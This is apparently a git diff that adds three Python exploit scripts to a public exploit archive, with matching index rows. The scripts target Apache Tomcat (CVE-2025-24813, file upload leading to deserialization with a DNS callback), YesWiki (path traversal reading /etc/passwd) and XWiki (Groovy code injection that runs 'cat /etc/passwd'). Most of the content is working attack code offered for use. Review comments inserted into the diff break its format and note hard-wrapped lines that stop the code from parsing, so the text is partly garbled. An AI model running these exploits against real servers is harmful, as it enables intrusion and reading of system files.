diff --git a/exploits/multiple/webapps/52134.txt b/exploits/multiple/webapps/52134.txt
new file mode 100644
index 000000000..8c4a763ff
--- /dev/null
+++ b/exploits/multiple/webapps/52134.txt
@@ -0,0 +1,63 @@
+# Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution
+# Exploit Author: Al Baradi Joy
+# CVE: CVE-2025-24813
+# Date: 2025-04-06
+# Vendor Homepage: https://tomcat.apache.org/
+# Software Link: https://tomcat.apache.org/download-90.cgi
+# Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98
+# Tested on: Apache Tomcat 10.1.33
+# CVSS: 9.8 (CRITICAL)
+# CWE: CWE-44, CWE-502
+# Reference:
+https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
+
+import requests
+import random
+import string
+import sys
+
+def rand_filename(length=6):
+ return ''.join(random.choices(string.ascii_lowercase, k=length))
+
+def generate_payload(interact_url):
+ # Java serialized payload gadget triggering DNS interaction
+ return f'\xac\xed\x00\x05...' # Replace with actual gadget bytes or
+generator
+
+def exploit(target, interact_url):
+ filename = rand_filename()
+ put_url = f"{target}/(unknown).session"
+ get_url = f"{target}/(unknown)"
+ headers = {
+ "Content-Range": "bytes 0-452/457",
+ "Content-Type": "application/octet-stream"
+ }
+ payload = generate_payload(interact_url)
+
+ print("[+] Exploit for CVE-2025-24813")
+ print("[+] Made By Al Baradi Joy\n")
+ print(f"[+] Uploading payload to: {put_url}")
+ r1 = requests.put(put_url, data=payload, headers=headers)
+ if r1.status_code == 201:
+ print("[+] Payload uploaded successfully.")
+ else:
+ print(f"[-] Upload failed with status: {r1.status_code}")
+ return
+
+ print(f"[+] Triggering payload via: {get_url}")
+ cookies = {"JSESSIONID": f".(unknown)"}
+ r2 = requests.get(get_url, cookies=cookies)
+ print(f"[+] Trigger request sent.
Check for DNS callback to:
+{interact_url}")
+
+if __name__ == "__main__":
+ # Display banner first
+ print("[+] Exploit for CVE-2025-24813")
+ print("[+] Made By Al Baradi Joy\n")
+
+ # Ask the user for the target domain and interact URL
+ target_url = input("Enter the target domain (e.g., http://localhost:8080):
+")
+ interact_url = input("Enter your interactsh URL: ")
+
+ exploit(target_url, interact_url)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52135.txt b/exploits/multiple/webapps/52135.txt
new file mode 100644
index 000000000..07099cb9f
--- /dev/null
+++ b/exploits/multiple/webapps/52135.txt
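Review bot: Many statements in this file are hard-wrapped mid-line — `# Reference:` continues as a bare `https://scrapco.de/...` line, the comment ending `bytes or` continues as a bare `generator` line, the `print(f"[+] Trigger request sent.` string is split before `{interact_url}")`, and the `input(...)` call is split before `")` — and because the hunk's 63-line count includes those fragments, the file as committed does not parse as Python. The same wrapping affects 52135.txt (`payload =` / `f"/?UrkCEO...`, the two `# Description:` continuation lines that lack a leading `#`) and 52136.txt (`exploit_url =` / `f"{target_url}/bin/...`, `.replace("http://",` / `"")`), which has additionally lost all indentation; this looks like mail-client wrapping of the submission, so the archived files should be re-imported from the unwrapped source. Separately, the two banner `print` calls run twice per invocation, once in `__main__` (commented "Display banner first") and again at the top of `exploit()`; keep one copy, e.g. in a `banner()` helper as 52135.txt does. `requests.put(...)` and `requests.get(...)` pass no `timeout=`, unlike the `timeout=10` / `timeout=5` used by the other two scripts in this commit, and `import sys` is unused.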
@@ -0,0 +1,64 @@
+# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal
+# Exploit Author: Al Baradi Joy
+# Exploit Date: April 6, 2025
+# CVE ID: CVE-2025-31131
+# Vendor Homepage: https://yeswiki.net/
+# Software Link: https://github.com/YesWiki/yeswiki
+# Affected Version: < 4.5.2
+# Tested On: YesWiki 4.5.1 on Ubuntu 22.04
+# Vulnerability Type: Unauthenticated Path Traversal (LFI)
+# CVSS Score: 8.6 (High)
+# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+# Description:
+# YesWiki before version 4.5.2 is vulnerable to unauthenticated path
+traversal via the 'squelette' parameter.
+# A remote attacker can exploit this issue to read arbitrary files on the
+server, such as /etc/passwd.
+
+import requests
+import sys
+
+def banner():
+ print("=" * 80)
+ print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal
+(CVE-2025-31131)")
+ print(" Exploit Author: Al Baradi Joy")
+ print("=" * 80)
+
+def exploit(target, filename="/etc/passwd"):
+ if not target.startswith("http"):
+ target = "http://" + target
+
+ traversal = "../" * 8
+ encoded_file = filename.replace("/", "%2f")
+ payload =
+f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css"
+ url = target.rstrip("/") + payload
+
+ try:
+ print(f"[+] Target: {target}")
+ print(f"[+] Attempting to read: (unknown)")
+ response = requests.get(url, timeout=10)
+
+ if response.status_code == 200 and "root:" in response.text:
+ print("[+] Exploit successful. File contents:\n")
+ print(response.text)
+ else:
+ print("[!] Exploit failed or file not readable.")
+ print(f"Status Code: {response.status_code}")
+ if len(response.text) < 200:
+ print(f"Response:\n{response.text}")
+ except requests.exceptions.RequestException as e:
+ print(f"[!]
Request failed: {e}") + +if __name__ == "__main__": + banner() + if len(sys.argv) < 2: + print(f"Usage: python3 {sys.argv[0]} [file_to_read]") + print(f"Example: python3 {sys.argv[0]} http://victim.com +/etc/passwd") + sys.exit(1) + + target_url = sys.argv[1] + file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd" + exploit(target_url, file_to_read) \ No newline at end of file diff --git a/exploits/multiple/webapps/52136.txt b/exploits/multiple/webapps/52136.txt new file mode 100644 index 000000000..59b4f8ba4 --- /dev/null +++ b/exploits/multiple/webapps/52136.txt 
@@ -0,0 +1,97 @@
+# Exploit Title: XWiki Platform - Remote Code Execution
+# Exploit Author: Al Baradi Joy
+# Exploit Date: April 6, 2025
+# CVE ID: CVE-2025-24893
+# Vendor Homepage: https://www.xwiki.org/
+# Software Link: https://github.com/xwiki/xwiki-platform
+# Version: Affected versions up to and including XWiki 15.10.10
+# Tested Versions: XWiki 15.10.10
+# Vulnerability Type: Remote Code Execution (RCE)
+# CVSS Score: 9.8 (Critical)
+# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+# Description:
+# XWiki Platform suffers from a critical vulnerability where any guest user
+can
+# execute arbitrary code remotely through the SolrSearch endpoint. This can
+lead
+# to a full server compromise, including the ability to execute commands on
+the
+# underlying system. The vulnerability impacts the confidentiality,
+integrity,
+# and availability of the XWiki installation. The issue has been patched in
+XWiki
+# versions 15.10.11, 16.4.1, and 16.5.0RC1.
+# Proof of Concept: Yes
+# Categories: XWiki, Remote Code Execution, CVE-2025, RCE
+# References:
+# - GHSA Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j
+# - NVD CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
+# - GitHub Exploit Link:
+https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py
+
+import requests
+
+# Banner
+def display_banner():
+print("="*80)
+print("Exploit Title: CVE-2025-24893 - XWiki Platform Remote Code
+Execution")
+print("Exploit Author: Al Baradi Joy")
+print("GitHub Exploit:
+https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py")
+print("="*80)
+
+# Function to detect the target protocol (HTTP or HTTPS)
+def detect_protocol(domain):
+https_url = f"https://{domain}"
+http_url = f"http://{domain}"
+
+try:
+response = requests.get(https_url, timeout=5, allow_redirects=True)
+if response.status_code < 400:
+print(f"[✔] Target supports HTTPS: {https_url}")
+return https_url
+except requests.exceptions.RequestException:
+print("[!]
HTTPS not available, falling back to HTTP.") + +try: +response = requests.get(http_url, timeout=5, allow_redirects=True) +if response.status_code < 400: +print(f"[✔] Target supports HTTP: {http_url}") +return http_url +except requests.exceptions.RequestException: +print("[✖] Target is unreachable on both HTTP and HTTPS.") +exit(1) + +# Exploit function +def exploit(target_url): +target_url = detect_protocol(target_url.replace("http://", +"").replace("https://", "").strip()) +exploit_url = +f"{target_url}/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d" + +try: +print(f"[+] Sending request to: {exploit_url}") +response = requests.get(exploit_url, timeout=10) + +# Check if the exploit was successful +if response.status_code == 200 and "root:" in response.text: +print("[✔] Exploit successful! Output received:") +print(response.text) +else: +print(f"[✖] Exploit failed. Status code: +{response.status_code}") + +except requests.exceptions.ConnectionError: +print("[✖] Connection failed. Target may be down.") +except requests.exceptions.Timeout: +print("[✖] Request timed out. Target is slow or unresponsive.") +except requests.exceptions.RequestException as e: +print(f"[✖] Unexpected error: {e}") + +# Main execution +if __name__ == "__main__": +display_banner() +target = input("[?] Enter the target URL (without http/https): +").strip() +exploit(target) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 49e50baa9..9245b6df5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -11708,6 +11708,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51447,exploits/multiple/webapps/51447.py,"Apache Superset 2.0.0 - Authentication Bypass",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27524,,,,,
 48143,exploits/multiple/webapps/48143.py,"Apache Tomcat - AJP 'Ghostcat File Read/Inclusion",2020-02-20,YDHCUI,webapps,multiple,,2020-02-27,2020-03-02,0,CVE-2020-1938,,,,,https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/8bd38f4cf22331ecf4e48096a78c5931509c26be/CNVD-2020-10487-Tomcat-Ajp-lfi.py
 49039,exploits/multiple/webapps/49039.rb,"Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)",2020-11-13,SunCSR,webapps,multiple,,2020-11-13,2020-11-13,1,CVE-2020-1938,,,,,
+52134,exploits/multiple/webapps/52134.txt,"Apache Tomcat 11.0.3 - Remote Code Execution",2025-04-07,"Al Baradi Joy",webapps,multiple,,2025-04-07,2025-04-07,0,CVE-2025-24813,,,,,
 10292,exploits/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,webapps,multiple,,2009-11-30,2010-07-09,1,,,,,http://www.exploit-db.comjakarta-tomcat-3.2.1.tar.gz,
 29435,exploits/multiple/webapps/29435.txt,"Apache Tomcat 5.5.25 - Cross-Site Request Forgery",2013-11-04,"Ivano Binetti",webapps,multiple,,2013-11-06,2013-11-06,0,CVE-2013-6357;OSVDB-99375,,,,,http://www.webapp-security.com/2013/11/apache-tomcat-5-5-25-deployundeploystartstop-applications/
 50119,exploits/multiple/webapps/50119.txt,"Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)",2021-07-13,"Central InfoSec",webapps,multiple,,2021-07-13,2021-07-13,0,CVE-2019-0221,,,,,
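Review bot: The new 52134 row's description, `"Apache Tomcat 11.0.3 - Remote Code Execution"`, names the version that the exploit header gives as the fix boundary (`# Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98`, `# Tested on: Apache Tomcat 10.1.33`), so the index reads as if 11.0.3 itself were vulnerable. The other two rows in this commit use the tested version, so the consistent form would be `52134,exploits/multiple/webapps/52134.txt,"Apache Tomcat 10.1.33 - Remote Code Execution",...` with the rest of the row unchanged. The row's `date_published` of 2025-04-07 also differs from the file's `# Date: 2025-04-06` (the same mismatch applies to the 52135 and 52136 rows in the next hunk), and the source-URL column is left empty although the file carries a `# Reference:` link; both are worth aligning, since vulnerability-management tooling that consumes this CSV keys on the version and date fields.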
@@ -12427,7 +12428,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34237,exploits/multiple/webapps/34237.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (2)",2010-07-02,"Marcos Garcia & Maximiliano Soler",webapps,multiple,,2010-07-02,2014-08-02,1,,,,,,https://www.securityfocus.com/bid/41322/info
 49073,exploits/multiple/webapps/49073.txt,"xuucms 3 - 'keywords' SQL Injection",2020-11-19,icekam,webapps,multiple,,2020-11-19,2020-11-19,0,CVE-2020-28091,,,,,
 49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",2021-01-18,"Karan Keswani",webapps,multiple,,2021-01-18,2021-01-18,0,,,,,,
+52136,exploits/multiple/webapps/52136.txt,"XWiki Platform 15.10.10 - Remote Code Execution",2025-04-07,"Al Baradi Joy",webapps,multiple,,2025-04-07,2025-04-07,0,CVE-2025-24893,,,,,
 17111,exploits/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) - Persistent / Reflective Cross-Site Scripting",2011-04-04,"Michael Brooks",webapps,multiple,,2011-04-04,2016-10-27,0,OSVDB-78072;OSVDB-71717;OSVDB-71716;CVE-2011-5025;OSVDB-71715,,,,http://www.exploit-db.comyaws-1.88.tar.gz,https://sitewat.ch/en/Advisory/4
+52135,exploits/multiple/webapps/52135.txt,"YesWiki 4.5.1 - Unauthenticated Path Traversal",2025-04-07,"Al Baradi Joy",webapps,multiple,,2025-04-07,2025-04-07,0,CVE-2025-31131,,,,,
 10752,exploits/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,webapps,multiple,80,2009-12-27,,0,,,,,,
 10431,exploits/multiple/webapps/10431.txt,"Zabbix Agent < 1.6.7 - Remote Bypass",2009-12-14,Nicob,webapps,multiple,80,2009-12-13,,1,CVE-2009-4502;OSVDB-60956,,,,http://www.exploit-db.comzabbix_agents_1.1_Solaris5.9_i386.tar_.gz,
 10432,exploits/multiple/webapps/10432.txt,"Zabbix Server - Multiple Vulnerabilities",2009-12-14,Nicob,webapps,multiple,80,2009-12-13,2016-10-27,1,CVE-2009-4501;CVE-2009-4499;CVE-2009-4498;OSVDB-60968;OSVDB-60966;OSVDB-60965,,,,,